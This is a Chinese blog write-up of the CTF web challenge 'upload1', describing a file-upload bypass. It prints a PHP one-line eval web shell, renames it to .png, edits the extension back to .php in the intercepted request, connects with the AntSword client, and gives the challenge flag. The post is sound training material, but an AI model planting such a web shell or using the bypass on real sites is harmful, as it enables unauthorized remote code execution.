攻防世界we进阶区之upload1

最新推荐文章于 2020-08-19 15:15:43 发布
最新推荐文章于 2020-08-19 15:15:43 发布
阅读量264 收藏 1
点赞数 1
分类专栏: CTF web 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45756971/article/details/107880067
版权
CTF 同时被 2 个专栏收录
30 篇文章 2 订阅
订阅专栏
web
22 篇文章 0 订阅
订阅专栏

题目:在这里插入图片描述打开链接,先上传一个php文件试试在这里插入图片描述所以,我们新建一个1.txt,写入php一句话: <?php @eval($_REQUEST[‘c’]);?>然后修改文件后缀为.png
在这里插入图片描述
上传该文件并抓包,修改filename后缀为.php在这里插入图片描述得到upload:upload/1596870603.1.php,打开成功在这里插入图片描述利用中国蚁剑链接,密码即为刚刚所创的png格式的php文件里的c在这里插入图片描述连接成功,打开html文件下的flag.php即可得到flag在这里插入图片描述$flag=“cyberpeace{e54061244aa29c17a76089dfe7ab9bc4}”

Blank⁰
关注
专栏目录
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
2018HitbCTF 萌新的upload题目writeup
publicStr的博客
04-14 1902
开始前的例行叨叨:被虐到怀疑人生,比赛群加了不少,题没做出来,签到倒是越来越专业了。记录下比赛后两小时才做出来的最简单webupload。记录下尝试过的姿势。题目介绍:根目录下:/system/   403/admin/    403/upload/   403/upfile/     403还有某个需要寻找的目录文件:/index.html/flag.php/upload.php/pic.ph...
攻防世界web进阶upload1
gongjingege的博客
07-17 429
文件上传与绕过,一句话木马,菜刀 打开链接后,出来一个上传框,先查看源代码 可以看出只能上传jpg,png格式的文件 用bp抓包,一句话,菜刀直接得到flag 新建一个txt,一句话,后缀改为jpg 在上传中用bp抓包 将fk.jpg改为fk.php,实现对文件格式要求的绕过 菜刀获取目录下的文件 得到flag 还不能熟练了解使用这些工具,对漏洞不了解,继续努力(ง •_•)ง 2020.7.17 公瑾 ...
攻防世界WEB进阶upload1
热门推荐
harry_c的博客
10-03 1万+
攻防世界WEB进阶upload1一、分析二、实操三、答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 题目场景: 略 题目附件: 暂无 一、分析 首先打开场景,上传文件进行抓包操作,发现存在部分js代码。 function check(){ upfile = document.getElementById("upfile"); submit = document.getElement...
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127862299
攻防世界杂项流量分析1
11-14
攻防世界杂项流量分析1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840807
攻防世界MISC进阶之Banmabanma
qq_45756971的博客
08-19 5594
打开所给附件,看见是个斑马,但我们可以看出来它的身体是一个条形码 我们直接利用条形码在线阅读得到其内容:https://online-barcode-reader.inliteresearch.com/ 结合所给格式,答案为flag{TENSHINE}
攻防世界MISC进阶之reverseMe
qq_45756971的博客
08-19 1908
打开所给附件,是一张jpg图片我们发现他就是镜像的flag,我们用Photoshop将其打开,图像→图像旋转→水平翻转画布,即可得到flagflag{4f7548f93c7bef1dc6a0542cf04e796e}
攻防世界MISC进阶之Hear-with-your-Eyes
qq_45756971的博客
08-19 854
下载所给附件,用winhex打开,发现是个wav文件,果然修改文件扩展名为.rar 会发现有一个音频文件,我们用audacity打开,选择左上方的sound选项,找到其中的频谱图,就会得出答案直接输入flag后边的内容就完成了。 ...
攻防世界MISC进阶之Modbus
qq_45756971的博客
08-13 522
下载所给附件,发现可以用wireshark打开,打开后用Modbus过滤器搜索flag 发现后右击-追溯流-tcp流,即可找到一些类似flag的东东根据它我们再补完整Modbus即可得到完整的flag:sctf{Easy_Modbus}
攻防世界MISC进阶之wireshark-1
qq_45756971的博客
08-13 498
下载所给附件,用wireshark打开过滤器筛选为HTTP,并搜索POST找到追踪TCP流,在返回结果中就可以看到flagflag{ffb7567a1d4f4abdffdb54e022f8facd}
攻防世界web进阶之unfinish
qq_45756971的博客
08-08 475
题目:进入所给链接,发现是一个登陆界面 我们进入注册界面题目为二次注入,参照大佬给出的代码,修改注册url和登录url即可跑出flag import requests import time from bs4 import BeautifulSoup #html解析器 def getDatabase(): database = '' for i in range(10): data_database = { 'username':"0'+
攻防世界web进阶之bug
qq_45756971的博客
08-05 434
题目如图所示:打开题目所给链接,会发现一个登陆界面我们先注册 然后登陆,成功点击manage会发现弹出对话框我们返回登录界面还发现一个fiadwd找回密码界面,输入信息,修改密码是用burp抓包抓包修改账户密码重置管理员密码成功。登录账号。再点击manage又弹出一个对话框所以我们在抓的包中添加一个 X-Forwarded-For: 127.0.0.1,发现传参:index.php?module=filemanage&do=???,我们根据题目猜测是upload,传参试试先传参成功,我们选择一个p
攻防世界web进阶Web_php_unserialize
qq_45756971的博客
07-30 431
打开题目链接会得到一堆代码 通过 //the secret is in the fl4g.php 这句话我们可以看出来我们所需要的flag在fl4g.php中,我们需要通过反序列化才能得到fl4g.php里边的内容,借鉴下别人的代码通过在线运行工具我们就可以解出所需参数TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 传参 ?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZml
攻防世界MSIC进阶之can_has_stdio?
qq_45756971的博客
08-17 417
下载所给附件,我们可直接用记事本打开,打开后会看见它是由±<>这样符号组成的五角星,再结合题目stdio,估计是c语言编译后的文件,我们可以直接用Brainfuck在线解码,点击Brainfuck to Text即可得到flagflag{esolangs_for_fun_and_profit} ...
攻防世界MISC进阶之Aesop_secret
qq_45756971的博客
08-17 411
下载附件发现是一张动态照片,用Photoshop打开,将9个图层全叠加到一起 发现是ISCC,像是一个密钥,将该图片放到winhex中打开,翻到最后边会发现一串加密后的字符我们用ASE在线解密,网址https://www.sojson.com/encrypt_aes.html 初次解密:我们进行二次解密:即可得到flag{DugUpADiamondADeepDarkMine} ...
攻防世界MISC进阶之a_good_idea
qq_45756971的博客
08-17 372
下载所给附件, 将文件后缀改为zip得到一个压缩文件,里边有一个文档和两张图片我们用stegslove将这两张图片合并, 我们会找到一个散布红点的图片,我们保存下来用Photoshop打开,将它的曝光度调到最高,我们就会得到一个二维码 用qrresearch扫描二维码即可得到答案NCTF{m1sc_1s_very_funny!!!} ...
攻防世界upload1
最新发布
07-28
抱歉,我无法回答这个问题。 #### 引用[.reference_title] - *1* [攻防世界-upload1-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125274195)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值